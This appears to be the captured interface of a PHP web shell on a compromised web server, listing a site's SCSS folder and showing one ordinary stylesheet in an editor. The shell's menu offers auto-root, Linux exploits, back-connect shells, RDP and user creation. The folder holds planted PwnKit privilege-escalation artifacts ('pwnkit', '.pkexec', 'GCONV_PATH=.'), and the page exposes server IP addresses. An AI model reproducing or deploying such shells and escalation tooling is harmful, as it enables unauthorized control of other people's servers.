Linux linux7.web4world.com 3.10.0-962.3.2.lve1.5.88.el7.x86_64 #1 SMP Fri Sep 26 14:06:42 UTC 2025 x86_64
: 199.38.113.107 | : 216.73.216.178
Cant Read [ /etc/named.conf ]
?5.6.40
siddhapu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
siddhapu /
public_html /
assets /
scss /
[ HOME SHELL ]
Name
Size
Permission
Action
?;
.pkexec
[ DIR ]
drwxr-xr-x
?;
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
_blog.scss
2.38
KB
-rw-r--r--
_blog_page.scss
29.56
KB
-rw-r--r--
_bradcam.scss
5.33
KB
-rw-r--r--
_color.scss
1.38
KB
-rw-r--r--
_common.scss
16.94
KB
-rw-r--r--
_contact-with-area.scss
464
B
-rw-r--r--
_contact.scss
2.82
KB
-rw-r--r--
_countDown.scss
1.77
KB
-rw-r--r--
_david-droga.scss
4.11
KB
-rw-r--r--
_details_page.scss
278
B
-rw-r--r--
_elements.scss
23.43
KB
-rw-r--r--
_extend.scss
2.53
KB
-rw-r--r--
_footer.scss
4.46
KB
-rw-r--r--
_h1-hero.scss
6.8
KB
-rw-r--r--
_headerMenu.scss
5.98
KB
-rw-r--r--
_mixins.scss
359
B
-rw-r--r--
_overlay.scss
1.03
KB
-rw-r--r--
_project-area.scss
4.12
KB
-rw-r--r--
_services.scss
585
B
-rw-r--r--
_services_section.scss
1.74
KB
-rw-r--r--
_support-company.scss
2.91
KB
-rw-r--r--
_team.scss
1.09
KB
-rw-r--r--
_testimonial.scss
2.75
KB
-rw-r--r--
_variables.scss
2.38
KB
-rw-r--r--
_wantToWork.scss
1.58
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
style.scss
1.08
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : _h1-hero.scss
.slider-height { min-height: 900px; background-repeat:no-repeat ; background-position: center center; background-size: cover; @media #{$md}{ min-height: 620px; } @media #{$md}{ min-height: 600px; } @media #{$sm}{ min-height: 600px; } @media #{$xs}{ min-height: 400px; } } .slider-height2{ min-height: 590px; background-repeat:no-repeat ; background-position: center center; @media #{$md}{ min-height: 500px; } @media #{$xs}{ min-height: 350px; } @media #{$sm}{ min-height: 350px; } } .btn1 { padding: 25px 0px; @media #{$md}{ padding: 25px 0; } } .slider-area{ margin-top: -1px; .hero__caption{ margin-left: 27px; padding-top: 150px; @media #{$md}{ padding-top: 70px } @media #{$sm}{ padding-top: 70px } @media #{$xs}{ padding-top: 70px } h1{ font-size: 140px; font-weight: 900; color: #ffffff; font-family: 'Barlow', sans-serif; line-height: 1; text-transform: uppercase; color: $theme-color; margin: 0; padding: 0; @media #{$lg}{ font-size: 135px; } @media #{$md}{ font-size: 110px; } @media #{$sm}{ font-size: 72px; } @media #{$xs}{ font-size: 42px; } } .stock-text { position: relative; left: 119px; top: -38px; @media #{$lg}{ top: -29px; } @media #{$md}{ top: -19px; } @media #{$sm}{ top: -12px; left: 40px; } @media #{$xs}{ top: -12px; left: 40px; top: 0; left: 0; } h2{ font-size: 140px; font-weight: 800; margin: 0; line-height: 1; text-transform: uppercase; position: absolute; color: #fff; @media #{$lg}{ font-size: 110px; } @media #{$md}{ font-size: 60px; } @media #{$sm}{ font-size: 52px; } @media #{$xs}{ font-size: 27px; margin-bottom: 25px; } // Effect &:nth-child(1){ color: transparent; -webkit-text-stroke: 1px#fff; -webkit-text-fill-color:transparent; } &:nth-child(2){ color: #ff5f13; -webkit-animation: animate 4s ease-in-out infinite; animation: animate 4s ease-in-out infinite; } } } @keyframes animate { 0%,100% { clip-path: polygon(0% 45%, 15% 44%, 32% 50%, 54% 60%, 70% 61%, 84% 69%, 100% 52%, 100% 100%, 0% 100%); } 50% { clip-path: polygon(0% 60%, 16% 65%, 34% 66%, 51% 62%, 67% 50%, 84% 45%, 100% 46%, 100% 100%, 0% 100%); } } .hero-text1, .hero-text2{ span,a{ position: relative; color: #fff; font-size: 18px; text-transform: uppercase; font-family: $font_3; font-weight: 400; letter-spacing: 0.03em; display: block; &::before{ position: absolute; content: ""; width: 25px; height: 2px; top: 0; left: -30px; top: 50%; transform: translateY(-50%); background: $theme-color; } @media #{$xs}{ margin-bottom: 20px; } } } .hero-text2{ @media #{$lg}{ margin-top: 100px; } @media #{$md}{ margin-top: 56px; } @media #{$sm}{ margin-top: 50px; } @media #{$xs}{ margin-top: 50px; } } } } // Hero Overly .hero-overly { position: relative; z-index: 1; &::before { position: absolute; content: ""; @extend %hero-overly; width: 100%; height: 100%; left: 0; top: 0; bottom: 0; right: 0; z-index: 0; background-repeat: no-repeat; } } // Another Hero Page .slider-area{ .hero-cap{ & h2{ color: #fff; font-size: 70px; font-weight: 900; text-transform: uppercase; @media #{$sm}{ font-size: 50px; } @media #{$xs}{ font-size: 50px; } } // nav { margin: 7px 0; padding-left: 95px; position: relative; &::before { position: absolute; content: ""; width: 75px; height: 1px; background: #ff5f13; left: 0; top: 52%; transform: translateY(-50%); } } .breadcrumb { background: none; padding: 0; margin: 0; a { color: #ff5f13; font-size: 17px; text-transform: uppercase; } } .breadcrumb-item + .breadcrumb-item::before { color: #ff5f13; } &.hero-cap2{ @media #{$xs}{ padding-top: 50px; } @media #{$sm}{ padding-top: 50px; } h2{ font-size: 60px; font-weight: 700; text-transform: capitalize; @media #{$sm}{ font-size: 37px; } @media #{$xs}{ font-size: 26px; } } } } }
Close